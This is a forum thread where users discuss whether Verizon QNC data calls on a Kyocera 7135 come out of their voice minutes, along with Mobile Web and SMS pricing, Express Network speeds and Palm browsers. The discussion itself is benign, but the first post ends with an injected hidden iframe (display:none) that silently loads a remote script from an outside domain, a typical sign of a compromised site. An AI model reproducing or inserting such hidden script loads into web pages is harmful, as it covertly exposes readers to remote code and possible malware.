+ Reply to Thread
Page 1 of 2 1 2 LastLast

Verizon QNC--Paying for Minutes?

I checked the faqs, but didn't see anything on this, and I'm not sure exactly how to run a search. I know that you don't need Mobile Web to get access to a wireless data connection. But, for those of you who are using the Verizon QNC network connection for wireless web (NOT using Express Network or Mobile Web plan), are you paying extra for using minutes on data? Or do the minutes you use just come out of your bucket?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ---------------
    The same thing we do every night, Pinky...

Yes, minutes come out of your available airtime minutes. A data call will use your airtime just like a voice call.

They come out of your normal bucket as a local type call (just classified as data)..

No addition charges unless you are roaming, etc...
    The one who dies with the most toys WINS :-)

Thanks guys. I just wanted to be sure because Sprint charges you per minute for a data call if you don't have their wireless web option (or at least they used to).
    :clap
    ---------------

VZW will still try to sell you Mobile Web. Just yesterday I tried to explain to a sales drone that I didn't need no stinkin Mobile Web. His response: "But you can have ALERTS sent to your phone!"

Hehe...Alerts is what I need..."The Redskins suck again this year," "Your stocks are worth less than toilet paper," "Cold weather front moving makes the weekend a real weenie-shrinker but still no snow," "Your ex-girlfriend is now stalking you".

Fortunately the sales guy I dealt with didn't even try. When he got to mobile web before I even had a chance to answer he mumbled to himself "why the heck would you want that, you've got internet on the palm". And got insurance too, then called CS and got my number changed to something easier to remember. All in all a pretty painless experience.

And he showed it to all the other reps at the store and told them "this is what everybody's calling about".
    ---------------

gentlemen, i have a 7135 on verizon and i can use the openwave wap browser, however i can't connect with the eis browser. as i am new to this wap verses html stuff, can anyone help with suggestions

Originally posted by jedi1000
    gentlemen, i have a 7135 on verizon and i can use the openwave wap browser, however i can't connect with the eis browser. as i am new to this wap verses html stuff, can anyone help with suggestions
    Follow the instructions in this FAQ for setting up QNC:

http://www.smartphonesource.com/vbul...&threadid=5385

If you still can't connect using EIS, tell us exactly what is happening when you try.

Alan

Originally posted by jazmaan
    VZW will still try to sell you Mobile Web. Just yesterday I tried to explain to a sales drone that I didn't need no stinkin Mobile Web. His response: "But you can have ALERTS sent to your phone!"
    The extra 100 text messages the main reason I've kept it. The WAP browser is cute for quick weather & movie info but since I'm replacing my text pager with this phone, 10 cents to send a single message is a little steep for me. I've even purchased another 200 messages since I must send/receive 5-10 messages/day.

If y'all know of a better/cheaper way, let me know.

Originally posted by Beryl
    Hmmm. Its a cellphone. You could try and call the person ... just a thought

I got Mobile Web as part of the promo they had when they sold their souls to Microsoft and put MSN on it...it included unlimited nights&weekends for $5 more a month...considering before, Mobile Web was $6-12 a month extra depending on the number of messages you wanted it was a nice deal. I got it more for the unlimited N&W tho. My current plan is 300 anytime, 1000 mobile-to-mobile and unlimited nights & weekends, and since I'm usually up at night, it fits nicely!
    LART 'em all! Let /root grep 'em out!

Token User - You took the words right out of my mouth
    The one who dies with the most toys WINS :-)

The extra 100 text messages the main reason I've kept it. The WAP browser is cute for quick weather & movie info but since I'm replacing my text pager with this phone, 10 cents to send a single message is a little steep for me. I've even purchased another 200 messages since I must send/receive 5-10 messages/day.

Id keep the 200 plan if your a heavy sms user but ditch the $5.00 moble web 100 minutes--- Unless you mostly send sms's your paying too much for it.

Recieve 100 sms @ 2 cents/ea = $2.00, savings of $3.00 over Moble web. Heck two of the 200 minute plans is better deal.
    iPhone therefore iAm.

Originally posted by Steve
    Id keep the 200 plan if your a heavy sms user but ditch the $5.00 moble web 100 minutes--- Unless you mostly send sms's your paying too much for it.

Recieve 100 sms @ 2 cents/ea = $2.00, savings of $3.00 over Moble web. Heck two of the 200 minute plans is better deal.
    That's a pretty good analysis and I'll have to look at just how many I send. I know I send an average of 5 per weekday and receive 5. Weekends I only receive 4 each day and maybe send 1. When things get hectic, it can be more in a given month though.

With the right PQAs, I really don't need the MSN's WAP IPs and Eudora's Web Browser for the quick information I rely on today. Anyone have a working Yahoo! PQA? The one I have doesn't work anymore.
    Originally posted by Token User
    Hmmm. Its a cellphone. You could try and call the person ... just a thought
    OOOO -- that just won't work. I send SMS to executives who are in meetings and they just want information and most of the time don't need or want to reply to me. They sure don't want me calling them! On the weekends, the big-wigs are probably skiing but they want to get status from the working folks via a text message.

OOOO -- that just won't work. I send SMS to executives who are in meetings and they just want information and most of the time don't need or want to reply to me. They sure don't want me calling them! On the weekends, the big-wigs are probably skiing but they want to get status from the working folks via a text message.
    Do those recipients have SMS receiving via a website? Why don't you just browse to the website and send messages from there? It might take a bit longer, but really saves $$.

Originally posted by KLiuLess
    Do those recipients have SMS receiving via a website? Why don't you just browse to the website and send messages from there? It might take a bit longer, but really saves $$.
    Yeah, that is good when I don't mind using minutes at night & weekends. The cheapest and fastest way is sending email to their pager or phone email equivalent (#@skytel.com, #@archwireless.net, #@vtext.com, #@mobile.att.com, etc.). That really works best when sending out a group status page. When I get a reply from someone to my #@vtext.com, I then respond to that individual using SMS.

Is there a big difference between qnc and 1x. I did not sign up for EN. I assume that's why qnc works but not 1x.

Yeah, I too am curious if EN is far faster than the qnc. Right now I am using the latter, so I would like to know every one's opinions.
    ~'kito
    pdaPhoneHome Moderator

Markito,

EN is certainly much faster than QNC Ė In repeated tests with a laptop connection; I always get > 70K each way, and have often gotten up to 130K during 1 minute tests in Boston. This is very impressive -- QNC never exceeded 14.4. They both drop packets, but EN is reliable enough to keep a VPN connection for hours at a time. QNC canít do this. Iím currently trying EN unlimited free for the month Ė I probably wonít keep it.

If you are asking about connection speed with the 7135 as PDA Ė Iím certain that you would notice the speed difference, but I donít think it would be that significant. In most cases, the 7135ís 33 Mhz processor canít keep up with EN.

Here are my comments on the useful apps:

1) Eudora web works well and skips most of the graphics. It is a cool geek tool and certainly works better with EN than QNC.
    2) Eudora e-mail works faster with EN, and is a great tool. But it works fine with QNC. Probably 3 times faster with EN vs. QNC.
    3) The 7135 ships with a new browser called EIS from Embedded Internet Solutions. Although this browser supports java script and some other things, it is so slow that I would never use it. I have only tried this with EN.
    4) Blazer works pretty well, and is certainly faster with EN. I would say it is twice as fast overall (going to Amazon and CNN). The latency when connecting their servers is still long. Still not useful enough that I would use it.
    5) Xiino is as fast as blazer Ė and faster under EN. But I canít see a real world situation where I would use this with or without EN.
    6) Avant Go can visit new pages and will request a connection without going to the AG connect app -Iím not sure if most people know this. This seems to be the best browsing solution. With EN it can reasonably download real web pages quickly. It defaultís to black and white Ė this is fine for me since I can read the content before falling asleep! I find this useful, and this might be a reason to pay for EN.
    7) Finally, OpenWave (Installed WAP browser) doesnít work on my phone since I got EN. Iím sure this will be resolved with VZís firmware. I miss having a WAP browser a lot. It may not be the best geek tool. But I used WAP for checking flights, traffic, weather, and reading top stories.

Glenn

Originally posted by glenn_butler
    Markito,

snipped

7) Finally, OpenWave (Installed WAP browser) doesnít work on my phone since I got EN. Iím sure this will be resolved with VZís firmware. I miss having a WAP browser a lot. It may not be the best geek tool. But I used WAP for checking flights, traffic, weather, and reading top stories.

Glenn
    This is a reason for using Blazer. Blazer can view every WAP page I have tried to access under EN. No need for the OpenWave browser or VZW's WAP gateway, or Waptunnel...

Alan